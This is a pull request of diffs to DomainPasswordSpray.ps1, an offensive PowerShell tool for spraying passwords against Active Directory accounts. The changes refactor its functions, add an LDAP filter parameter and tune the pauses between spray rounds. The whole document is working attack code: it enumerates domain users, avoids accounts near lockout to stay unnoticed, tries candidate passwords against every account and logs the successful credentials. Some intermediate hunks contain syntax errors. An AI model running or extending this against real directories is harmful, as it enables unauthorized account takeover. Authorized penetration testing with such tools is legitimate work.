### PR TITLE
Split some functions out, expose the filter, and add Delay + Jitter

### DIFF
--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -236,7 +236,7 @@ function Invoke-DomainPasswordSpray{
             }
             1 {"Cancelling the password spray."}
         }
-        #if the force flag is set we will not bother asking about proceeding with password spray.
+        # if the force flag is set we will not bother asking about proceeding with password spray.
         if($Force)
         {
             Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
@@ -349,7 +349,7 @@ Function Get-DomainUserList{
     {
         Try
         {
-            #Trying to use the current user's domain
+            # Trying to use the current user's domain
             $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
             $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
         }
@@ -388,7 +388,7 @@ Function Get-DomainUserList{
                 $PSOLockoutThreshold = $PSOFineGrainedPolicy.'msds-lockoutthreshold'
                 $PSOAppliesTo = $PSOFineGrainedPolicy.'msds-psoappliesto'
                 $PSOMinPwdLength = $PSOFineGrainedPolicy.'msds-minimumpasswordlength'
-                #adding lockout threshold to array for use later to determine which is the lowest.
+                # adding lockout threshold to array for use later to determine which is the lowest.
                 $AccountLockoutThresholds += $PSOLockoutThreshold
 
             Write-Host "[*] Fine-Grained Password Policy titled: $PSOPolicyName has a Lockout Threshold of $PSOLockoutThreshold attempts, minimum password length of $PSOMinPwdLength chars, and applies to $PSOAppliesTo.`r`n"
@@ -447,7 +447,7 @@ Function Get-DomainUserList{
             Write-Host -ForegroundColor "yellow" "[*] Removing users within 1 attempt of locking out from list."
             Foreach ($user in $AllUserObjects)
             {
-                #Getting bad password counts and lst bad password time for each user
+                # Getting bad password counts and lst bad password time for each user
                 $badcount = $user.Properties.badpwdcount
                 $samaccountname = $user.Properties.samaccountname
                 try

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -174,7 +174,7 @@ function Invoke-DomainPasswordSpray{
 
         $result = $host.ui.PromptForChoice($title, $message, $options, 0)
 
-        If ($result != 0)
+        If ($result -ne 0)
         {
             Write-Host "Cancelling the password spray."
             break

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -266,7 +266,7 @@ function Get-DomainUserList{
 
      [Parameter(Position = 2, Mandatory = $false)]
      [switch]
-     $RemovePotentialLockouts
+     $RemovePotentialLockouts,
 
      [Parameter(Position = 2, Mandatory = $false)]
      [string]

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -61,7 +61,6 @@ function Invoke-DomainPasswordSpray{
 
     #>
     param(
-
      [Parameter(Position = 0, Mandatory = $false)]
      [string]
      $UserList = "",
@@ -82,11 +81,11 @@ function Invoke-DomainPasswordSpray{
      [string]
      $Filter = "",
 
-     [Parameter(Position = 4, Mandatory = $false)]
+     [Parameter(Position = 5, Mandatory = $false)]
      [string]
      $Domain = "",
 
-     [Parameter(Position = 5, Mandatory = $false)]
+     [Parameter(Position = 6, Mandatory = $false)]
      [switch]
      $Force
     )
@@ -183,10 +182,13 @@ function Invoke-DomainPasswordSpray{
     Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
     Write-Host "[*] This might take a while depending on the total number of users"
 
-    foreach($Password_Item in $Passwords)
+    for($i = 0; $i -lt $Passwords.count; $i++)
     {
-        Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password_Item)
-        Countdown-Timer -Seconds (60*$observation_window)
+        Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Passwords[$i])
+        if ($i -lt $Passwords.count)
+        {
+            Countdown-Timer -Seconds (60*$observation_window)
+        }
     }
     Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
     if ($OutFile -ne "")
@@ -209,8 +211,8 @@ function Countdown-Timer
     Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed
 }
 
-function Get-DomainUserList{
-
+function Get-DomainUserList(
+{
 <#
     .SYNOPSIS
 
@@ -429,8 +431,19 @@ function Get-DomainUserList{
     return $UserListArray
 }
 
-function Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password)
+function Invoke-SpraySinglePassword
 {
+    param(
+            [Parameter(Position=1)]
+            [string]
+            $CurrentDomain,
+            [Parameter(Position=2)]
+            [string]
+            $UserListArray,
+            [Parameter(Position=3)]
+            [string]
+            $Password
+    )
     $time = Get-Date
     $count = $UserListArray.count
     Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -211,7 +211,7 @@ function Countdown-Timer
     Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed
 }
 
-function Get-DomainUserList(
+function Get-DomainUserList
 {
 <#
     .SYNOPSIS
@@ -274,7 +274,7 @@ function Get-DomainUserList(
      [switch]
      $RemovePotentialLockouts,
 
-     [Parameter(Position = 2, Mandatory = $false)]
+     [Parameter(Position = 3, Mandatory = $false)]
      [string]
      $Filter
     )

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -107,7 +107,7 @@ function Invoke-DomainPasswordSpray{
     }
     catch
     {
-        Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try specifying the domain name with the -Domain option."
+        Write-Host -ForegroundColor "red" "[*] Could not connect to the domain. Try specifying the domain name with the -Domain option."
         break
     }
 
@@ -179,13 +179,13 @@ function Invoke-DomainPasswordSpray{
             break
         }
     }
-    Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
+    Write-Host -ForegroundColor Yellow "[*] Password spraying has begun with $(Passwords.count) passwords"
     Write-Host "[*] This might take a while depending on the total number of users"
 
     for($i = 0; $i -lt $Passwords.count; $i++)
     {
-        Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Passwords[$i])
-        if ($i -lt $Passwords.count)
+        Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Passwords[$i], $OutFile)
+        if (($i+1) -lt $Passwords.count)
         {
             Countdown-Timer -Seconds (60*$observation_window)
         }
@@ -441,7 +441,11 @@ function Invoke-SpraySinglePassword
             $UserListArray,
             [Parameter(Position=3)]
             [string]
-            $Password
+            $Password,
+            [Parameter(Position=4)]
+            [string]
+            $OutFile,
+
     )
     $time = Get-Date
     $count = $UserListArray.count

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -330,11 +330,11 @@ Function Get-DomainUserList{
      $RemovePotentialLockouts
     )
 
-   if ($Domain -ne "")
+    if ($Domain -ne "")
     {
         Try
         {
-            #Using domain specified with -Domain option
+            # Using domain specified with -Domain option
             $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
             $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
             $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
@@ -426,7 +426,10 @@ Function Get-DomainUserList{
             Write-Host -ForegroundColor "yellow" "[*] Removing disabled users from list."
             # More precise LDAP filter UAC check for users that are disabled (Joff Thyer)
             # LDAP 1.2.840.113556.1.4.803 means bitwise &
-            $UserSearcher.filter = "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=2))"
+            # uac 0x2 is ACCOUNTDISABLE
+            # uac 0x10 is LOCKOUT
+            # See http://jackstromberg.com/2013/01/useraccountcontrol-attributeflag-values/
+            $UserSearcher.filter = "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=18))"
         }
         else
         {

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -185,7 +185,7 @@ function Invoke-DomainPasswordSpray{
 
     ForEach($Password_Item in $Passwords)
     {
-        TestPassword($CurrentDomain, $UserListArray, $Password_Item)
+        Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password_Item)
         Countdown-Timer -Seconds (60*$observation_window)
     }
     Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
@@ -426,7 +426,7 @@ Function Get-DomainUserList{
     return $UserListArray
 }
 
-function TestPassword($CurrentDomain, $UserListArray, $Password)
+function Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password)
 {
     $time = Get-Date
     $count = $UserListArray.count

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -80,6 +80,10 @@ function Invoke-DomainPasswordSpray{
 
      [Parameter(Position = 4, Mandatory = $false)]
      [string]
+     $Filter = "",
+
+     [Parameter(Position = 4, Mandatory = $false)]
+     [string]
      $Domain = "",
 
      [Parameter(Position = 5, Mandatory = $false)]

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -195,20 +195,20 @@ function Invoke-DomainPasswordSpray{
     }
 }
 
-Function Countdown-Timer
+function Countdown-Timer
 {
     param(
         $Seconds = 1800,
         $Message = "[*] Pausing to avoid account lockout."
     )
-    ForEach ($Count in (1..$Seconds))
+    foreach ($Count in (1..$Seconds))
     {   Write-Progress -Id 1 -Activity $Message -Status "Waiting for $($Seconds/60) minutes. $($Seconds - $Count) seconds remaining" -PercentComplete (($Count / $Seconds) * 100)
         Start-Sleep -Seconds 1
     }
     Write-Progress -Id 1 -Activity $Message -Status "Completed" -PercentComplete 100 -Completed
 }
 
-Function Get-DomainUserList{
+function Get-DomainUserList{
 
 <#
     .SYNOPSIS
@@ -434,7 +434,8 @@ function Invoke-SpraySinglePassword($CurrentDomain, $UserListArray, $Password)
     $curr_user = 0
     Write-Host -ForegroundColor Yellow "[*] Writing successes to $OutFile"
 
-    ForEach($User in $UserListArray){
+    foreach ($User in $UserListArray)
+    {
         $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$User,$Password)
         if ($Domain_check.name -ne $null)
         {

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -435,7 +435,6 @@ function Invoke-SpraySinglePassword
 {
     param(
             [Parameter(Position=1)]
-            [string]
             $CurrentDomain,
             [Parameter(Position=2)]
             [string]

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -444,7 +444,7 @@ function Invoke-SpraySinglePassword
             $Password,
             [Parameter(Position=4)]
             [string]
-            $OutFile,
+            $OutFile
 
     )
     $time = Get-Date

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -33,9 +33,9 @@ function Invoke-DomainPasswordSpray{
     .PARAMETER Domain
 
     The domain to spray against.
-    
+
     .PARAMETER Force
-    
+
     Forces the spray to continue and doesn't prompt for confirmation.
 
     .EXAMPLE
@@ -79,80 +79,28 @@ function Invoke-DomainPasswordSpray{
      $Domain = "",
 
      [Parameter(Position = 5, Mandatory = $false)]
-     [switch]     
+     [switch]
      $Force
     )
-    
-    if ($Domain -ne "")
-    {
-        Try 
-        {
-            #Using domain specified with -Domain option
-            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
-            $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
-            $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
-        }
-        catch 
-        {
-            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try again specifying the domain name with the -Domain option."    
-            break
-        }
-    }
-    else 
-    {
-        Try 
-        {
-            #Trying to use the current user's domain
-            $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
-            $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
-        }
-        catch 
-        {
-            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try specifying the domain name with the -Domain option."    
-            break
-        }
-    }
-
-    if ($UserList -eq "")
-    {
-    $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts
-    }
-    else
-    {
-        #if a Userlist is specified use it and do not check for lockout thresholds
-        Write-Host "[*] Using $UserList as userlist to spray with"
-        Write-Host -ForegroundColor "yellow" "[*] Warning: Users will not be checked for lockout threshold." 
-        $UserListArray = @()
-        try 
-        {
-            $UserListArray = Get-Content $UserList -ErrorAction stop
-        }
-        catch [Exception]{
-            Write-Host -ForegroundColor "red" "$_.Exception"
-            break
-        }
-    
-    }
 
     function TestPassword($CurrentDomain, $UserListArray, $Password)
     {
         $time = Get-Date
-        Write-Host -ForegroundColor Yellow "[*] Password spraying has begun. Current time is $($time.ToShortTimeString())"
-        Write-Host "[*] This might take a while depending on the total number of users"
-        $curr_user = 0
         $count = $UserListArray.count
+        Write-Host "[*] Now trying password $Password against $count users. Current time is $($time.ToShortTimeString())"
+        $curr_user = 0
 
         ForEach($User in $UserListArray){
             $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($CurrentDomain,$User,$Password)
             If ($Domain_check.name -ne $null)
             {
                 if ($OutFile -ne "")
-                {    
+                {
                     Add-Content $OutFile $User`:$Password
                 }
                 Write-Host -ForegroundColor Green "[*] SUCCESS! User:$User Password:$Password"
             }
-            $curr_user+=1 
+            $curr_user+=1
             Write-Host -nonewline "$curr_user of $count users tested`r"
         }
         Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
@@ -162,32 +110,93 @@ function Invoke-DomainPasswordSpray{
         }
     }
 
+    function Get-ObservationWindow()
+    {
+        # Get account lockout observation window to avoid running more than 1
+        # password spray per observation window.
+        $command = "cmd.exe /C net accounts /domain"
+        $net_accounts_results = Invoke-Expression -Command:$command
+        $stripped_policy = ($net_accounts_results | Where-Object {$_ -like "*Lockout Observation Window*"})
+        $stripped_split_a, $stripped_split_b = $stripped_policy.split(':',2)
+        $observation_window_no_spaces = $stripped_split_b -Replace '\s+',""
+        [int]$observation_window = [convert]::ToInt32($observation_window_no_spaces, 10)
+        return $observation_window
+    }
+
+    if ($Domain -ne "")
+    {
+        Try
+        {
+            # Using domain specified with -Domain option
+            $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
+            $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
+            $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
+        }
+        catch
+        {
+            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try again specifying the domain name with the -Domain option."
+            break
+        }
+    }
+    else
+    {
+        Try
+        {
+            # Trying to use the current user's domain
+            $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+            $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
+        }
+        catch
+        {
+            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try specifying the domain name with the -Domain option."
+            break
+        }
+    }
+
+    if ($UserList -eq "")
+    {
+        $UserListArray = Get-DomainUserList -Domain $Domain -RemoveDisabled -RemovePotentialLockouts
+    }
+    else
+    {
+        # if a Userlist is specified use it and do not check for lockout thresholds
+        Write-Host "[*] Using $UserList as userlist to spray with"
+        Write-Host -ForegroundColor "yellow" "[*] Warning: Users will not be checked for lockout threshold."
+        $UserListArray = @()
+        try
+        {
+            $UserListArray = Get-Content $UserList -ErrorAction stop
+        }
+        catch [Exception]
+        {
+            Write-Host -ForegroundColor "red" "$_.Exception"
+            break
+        }
+
+    }
+
     # If a single password is selected do this
     if ($Password)
     {
         #if no force flag is set we will ask if the user is sure they want to spray
         if (!$Force)
         {
-        $title = "Confirm Password Spray"
-        $message = "Are you sure you want to perform a password spray against " + $UserListArray.count + " accounts?"
+            $title = "Confirm Password Spray"
+            $message = "Are you sure you want to perform a password spray against " + $UserListArray.count + " accounts?"
 
-        $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", `
-            "Attempts to authenticate 1 time per user in the list."
+            $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", `
+                "Attempts to authenticate 1 time per user in the list."
 
-        $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", `
-            "Cancels the password spray."
+            $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", `
+                "Cancels the password spray."
 
-        $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no)
+            $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no)
 
-        $result = $host.ui.PromptForChoice($title, $message, $options, 0) 
+            $result = $host.ui.PromptForChoice($title, $message, $options, 0)
 
-        switch ($result)
+            switch ($result)
             {
-                0 
-                {
-                    TestPassword($CurrentDomain, $UserListArray, $Password)
-                
-                }
+                0 { TestPassword($CurrentDomain, $UserListArray, $Password) }
                 1 {"Cancelling the password spray."}
             }
         }
@@ -198,90 +207,84 @@ function Invoke-DomainPasswordSpray{
         }
 
 
-        
+
     }
         # If a password list is selected do this
-    ElseIf($PasswordList){
+    ElseIf($PasswordList)
+    {
         $Passwords = Get-Content $PasswordList
-        #Get account lockout observation window to avoid running more than 1 password spray per observation window.
-        $net_accounts = "cmd.exe /C net accounts /domain"
-        $net_accounts_results = Invoke-Expression -Command:$net_accounts
-        $stripped_policy = ($net_accounts_results | Where-Object {$_ -like "*Lockout Observation Window*"}) 
-        $stripped_split_a, $stripped_split_b = $stripped_policy.split(':',2)
-        $observation_window_no_spaces = $stripped_split_b -Replace '\s+',""
-        [int]$observation_window = [convert]::ToInt32($observation_window_no_spaces, 10)
+        $observation_window = Get-ObservationWindow
 
-        Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!"    
+        Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!"
         Write-Host -ForegroundColor Yellow "[*] The domain password policy observation window is set to $observation_window minutes."
         Write-Host "[*] Setting a $observation_window minute wait in between sprays."
-        
+
         #if no force flag is set we will ask if the user is sure they want to spray
         if (!$Force)
         {
-        $title = "Confirm Password Spray"
-        $message = "Are you sure you want to perform a password spray against " + $UserListArray.count + " accounts?"
+            $title = "Confirm Password Spray"
+            $message = "Are you sure you want to perform a password spray against " + $UserListArray.count + " accounts?"
 
-        $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", `
-            "Attempts to authenticate 1 time per user in the list for each password in the passwordlist file."
+            $yes = New-Object System.Management.Automation.Host.ChoiceDescription "&Yes", `
+                "Attempts to authenticate 1 time per user in the list for each password in the passwordlist file."
 
-        $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", `
-            "Cancels the password spray."
+            $no = New-Object System.Management.Automation.Host.ChoiceDescription "&No", `
+                "Cancels the password spray."
 
-        $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no)
+            $options = [System.Management.Automation.Host.ChoiceDescription[]]($yes, $no)
 
-        $result = $host.ui.PromptForChoice($title, $message, $options, 0) 
+            $result = $host.ui.PromptForChoice($title, $message, $options, 0)
 
-        switch ($result)
-        {
-            0 
+            switch ($result)
+            {
+                0
+                {
+                    Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
+                    Write-Host "[*] This might take a while depending on the total number of users"
+
+                    ForEach($Password_Item in $Passwords)
+                    {
+                        TestPassword($CurrentDomain, $UserListArray, $Password_Item)
+                    }
+                    Countdown-Timer -Seconds (60*$observation_window)
+
+                    Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
+                    if ($OutFile -ne "")
+                    {
+                        Write-Host -ForegroundColor Yellow "[*] Any passwords that were successfully sprayed have been output to $OutFile"
+                    }
+                }
+                1 {"Cancelling the password spray."}
+            }
+            #if the force flag is set we will not bother asking about proceeding with password spray.
+            if($Force)
             {
                 Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
                 Write-Host "[*] This might take a while depending on the total number of users"
 
                 ForEach($Password_Item in $Passwords)
                 {
-                    $time = Get-Date
-                    Write-Host "[*] Now trying password $Password_Item. Current time is $($time.ToShortTimeString())"
                     TestPassword($CurrentDomain, $UserListArray, $Password_Item)
+                    Countdown-Timer -Seconds (60*$observation_window)
                 }
-                Countdown-Timer -Seconds (60*$observation_window)
-            
                 Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
                 if ($OutFile -ne "")
                 {
                     Write-Host -ForegroundColor Yellow "[*] Any passwords that were successfully sprayed have been output to $OutFile"
                 }
-            }
-            1 {"Cancelling the password spray."}
-        }
-        #if the force flag is set we will not bother asking about proceeding with password spray.
-        if($Force)
-        {
-            Write-Host -ForegroundColor Yellow "[*] Password spraying has begun."
-            Write-Host "[*] This might take a while depending on the total number of users"
 
-            ForEach($Password_Item in $Passwords){
-                $time = Get-Date
-                Write-Host "[*] Now trying password $Password_Item. Current time is $($time.ToShortTimeString())"
-                TestPassword($CurrentDomain, $UserListArray, $Password_Item)
-                Countdown-Timer -Seconds (60*$observation_window)
             }
-            Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
-            if ($OutFile -ne "")
-            {
-                Write-Host -ForegroundColor Yellow "[*] Any passwords that were successfully sprayed have been output to $OutFile"
-            }
-                
         }
     }
-    Else{
-    Write-Host -ForegroundColor Red "The -Password or -PasswordList option must be specified"
-    break
+    Else
+    {
+        Write-Host -ForegroundColor Red "The -Password or -PasswordList option must be specified"
+        break
     }
 }
 
 Function Countdown-Timer
-{   
+{
     Param(
         $Seconds = 1800,
         $Message = "[*] Pausing to avoid account lockout."
@@ -299,7 +302,7 @@ Function Get-DomainUserList{
     .SYNOPSIS
 
     This module gathers a userlist from the domain.
-    
+
     DomainPasswordSpray Function: Get-DomainUserList
     Author: Beau Bullock (@dafthack)
     License: BSD 3-Clause
@@ -316,12 +319,12 @@ Function Get-DomainUserList{
 
     .PARAMETER RemoveDisabled
 
-    Attempts to remove disabled accounts from the userlist. (Credit to Sally Vandeven (@sallyvdv))   
-    
+    Attempts to remove disabled accounts from the userlist. (Credit to Sally Vandeven (@sallyvdv))
+
     .PARAMETER RemovePotentialLockouts
-    
-    Removes accounts within 1 attempt of locking out. 
-    
+
+    Removes accounts within 1 attempt of locking out.
+
     .EXAMPLE
 
     C:\PS> Get-DomainUserList
@@ -329,7 +332,7 @@ Function Get-DomainUserList{
     Description
     -----------
     This command will gather a userlist from the domain including all samAccountType "805306368".
-    
+
     .EXAMPLE
 
     C:\PS> Get-DomainUserList -Domain domainname -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii userlist.txt
@@ -337,48 +340,48 @@ Function Get-DomainUserList{
     Description
     -----------
     This command will gather a userlist from the domain "domainname" including any accounts that are not disabled and are not close to locking out. It will write them to a file at "userlist.txt"
-    
+
     #>
     Param(
      [Parameter(Position = 0, Mandatory = $false)]
      [string]
      $Domain = "",
-     
+
      [Parameter(Position = 1, Mandatory = $false)]
      [switch]
      $RemoveDisabled,
-     
+
      [Parameter(Position = 2, Mandatory = $false)]
      [switch]
      $RemovePotentialLockouts
     )
-    
+
    if ($Domain -ne "")
     {
-        Try 
+        Try
         {
             #Using domain specified with -Domain option
             $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
             $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetDomain($DomainContext)
             $CurrentDomain = "LDAP://" + ([ADSI]"LDAP://$Domain").distinguishedName
         }
-        catch 
+        catch
         {
-            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try again specifying the domain name with the -Domain option."    
+            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try again specifying the domain name with the -Domain option."
             break
         }
     }
-    else 
+    else
     {
-        Try 
+        Try
         {
             #Trying to use the current user's domain
             $DomainObject =[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
             $CurrentDomain = "LDAP://" + ([ADSI]"").distinguishedName
         }
-        catch 
+        catch
         {
-            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try specifying the domain name with the -Domain option."    
+            Write-Host -ForegroundColor "red" "[*] Could connect to the domain. Try specifying the domain name with the -Domain option."
             break
         }
     }
@@ -419,19 +422,13 @@ Function Get-DomainUserList{
 
     }
 
-        #Get account lockout observation window to avoid running more than 1 password spray per observation window.
-        $net_accounts = "cmd.exe /C net accounts /domain"
-        $net_accounts_results = Invoke-Expression -Command:$net_accounts
-        $stripped_policy = ($net_accounts_results | Where-Object {$_ -like "*Lockout Observation Window*"}) 
-        $stripped_split_a, $stripped_split_b = $stripped_policy.split(':',2)
-        $observation_window_no_spaces = $stripped_split_b -Replace '\s+',""
-        [int]$observation_window = [convert]::ToInt32($observation_window_no_spaces, 10)
+        $observation_window = Get-ObservationWindow
 
         #Generate a userlist from the domain
-        #Selecting the lowest account lockout threshold in the domain to avoid locking out any accounts. 
+        #Selecting the lowest account lockout threshold in the domain to avoid locking out any accounts.
         [int]$SmallestLockoutThreshold = $AccountLockoutThresholds | sort | Select -First 1
         Write-Host -ForegroundColor "yellow" "[*] Now creating a list of users to spray..."
-        
+
         if ($SmallestLockoutThreshold -eq "0")
         {
             Write-Host -ForegroundColor "Yellow" "[*] There appears to be no lockout policy."
@@ -440,7 +437,7 @@ Function Get-DomainUserList{
         {
             Write-Host -ForegroundColor "Yellow" "[*] The smallest lockout threshold discovered in the domain is $SmallestLockoutThreshold login attempts."
         }
-        
+
         $UserSearcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$CurrentDomain)
         $DirEntry = New-Object System.DirectoryServices.DirectoryEntry
         $UserSearcher.SearchRoot = $DirEntry
@@ -448,7 +445,7 @@ Function Get-DomainUserList{
         $UserSearcher.PropertiesToLoad.Add("samaccountname") > $Null
         $UserSearcher.PropertiesToLoad.Add("badpwdcount") > $Null
         $UserSearcher.PropertiesToLoad.Add("badpasswordtime") > $Null
-        
+
         If ($RemoveDisabled){
                 Write-Host -ForegroundColor "yellow" "[*] Removing disabled users from list."
                 # more precise LDAP filter UAC check for users that are disabled (Joff Thyer)
@@ -464,7 +461,7 @@ Function Get-DomainUserList{
         $AllUserObjects = $UserSearcher.FindAll()
         Write-Host -ForegroundColor "yellow" ("[*] There are " + $AllUserObjects.count + " total users found.")
         $UserListArray = @()
-        
+
         If ($RemovePotentialLockouts)
         {
         Write-Host -ForegroundColor "yellow" "[*] Removing users within 1 attempt of locking out from list."
@@ -487,9 +484,9 @@ Function Get-DomainUserList{
 
                 if ($badcount)
                 {
-                    
+
                     [int]$userbadcount = [convert]::ToInt32($badcount, 10)
-                    $attemptsuntillockout = $SmallestLockoutThreshold - $userbadcount   
+                    $attemptsuntillockout = $SmallestLockoutThreshold - $userbadcount
                     #if there is more than 1 attempt left before a user locks out or if the time since the last failed login is greater than the domain observation window add user to spray list
                     if (($timedifference -gt $observation_window) -Or ($attemptsuntillockout -gt 1))
                     {
@@ -506,7 +503,7 @@ Function Get-DomainUserList{
             $UserListArray += $samaccountname
             }
         }
-        
+
             Write-Host -foregroundcolor "yellow" ("[*] Created a userlist containing " + $UserListArray.count + " users gathered from the current user's domain")
             return $UserListArray
 }

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -380,12 +380,18 @@ function Get-DomainUserList
         # uac 0x10 is LOCKOUT
         # See http://jackstromberg.com/2013/01/useraccountcontrol-attributeflag-values/
         $UserSearcher.filter =
-            "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=18)$Filter)"
+            "(&(objectCategory=person)(objectClass=user)(!userAccountControl:1.2.840.113556.1.4.803:=16)(!userAccountControl:1.2.840.113556.1.4.803:=2)$Filter)"
     }
     else
     {
         $UserSearcher.filter = "(&(objectCategory=person)(objectClass=user)$Filter)"
     }
+
+    $UserSearcher.PropertiesToLoad.add("samaccountname")
+    $UserSearcher.PropertiesToLoad.add("lockouttime")
+    $UserSearcher.PropertiesToLoad.add("badpwdcount")
+    $UserSearcher.PropertiesToLoad.add("badpasswordtime")
+
     Write-Host $UserSearcher.filter
 
     # grab batches of 1000 in results

--- a/DomainPasswordSpray.ps1
+++ b/DomainPasswordSpray.ps1
@@ -56,7 +56,7 @@ function Invoke-DomainPasswordSpray{
 
 
     #>
-    Param(
+    param(
 
      [Parameter(Position = 0, Mandatory = $false)]
      [string]
@@ -84,7 +84,7 @@ function Invoke-DomainPasswordSpray{
     )
     if ($Domain -ne "")
     {
-        Try
+        try
         {
             # Using domain specified with -Domain option
             $DomainContext = New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext("domain",$Domain)
@@ -99,7 +99,7 @@ function Invoke-DomainPasswordSpray{
     }
     else
     {
-        Try
+        try
         {
             # Trying to use the current user's domain
             $DomainObject = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
@@ -135,20 +135,20 @@ function Invoke-DomainPasswordSpray{
     }
 
     # If a single password is selected do this
-    If ($Password)
+    if ($Password)
     {
         $Passwords = @($Password)
     }
-    ElseIf($PasswordList)
+    elseif($PasswordList)
     {
         $Passwords = Get-Content $PasswordList
     }
-    Else
+    else
     {
         Write-Host -ForegroundColor Red "The -Password or -PasswordList option must be specified"
         break
     }
-    If ($Passwords.count > 1)
+    if ($Passwords.count > 1)
     {
         Write-Host -ForegroundColor Yellow "[*] WARNING - Be very careful not to lock out accounts with the password list option!"
     }
@@ -159,7 +159,7 @@ function Invoke-DomainPasswordSpray{
     Write-Host "[*] Setting a $observation_window minute wait in between sprays."
 
     # if no force flag is set we will ask if the user is sure they want to spray
-    If (!$Force)
+    if (!$Force)
     {
         $title = "Confirm Password Spray"
         $message = "Are you sure you want to perform a password spray against " + $UserListArray.count + " accounts?"
@@ -174,7 +174,7 @@ function Invoke-DomainPasswordSpray{
 
         $result = $host.ui.PromptForChoice($title, $message, $options, 0)
 
-        If ($result -ne 0)
+        if ($result -ne 0)
         {
             Write-Host "Cancelling the password spray."
             break
@@ -189,7 +189,7 @@ function Invoke-DomainPasswordSpray{
         Countdown-Timer -Seconds (60*$observation_window)
     }
     Write-Host -ForegroundColor Yellow "[*] Password spraying is complete"
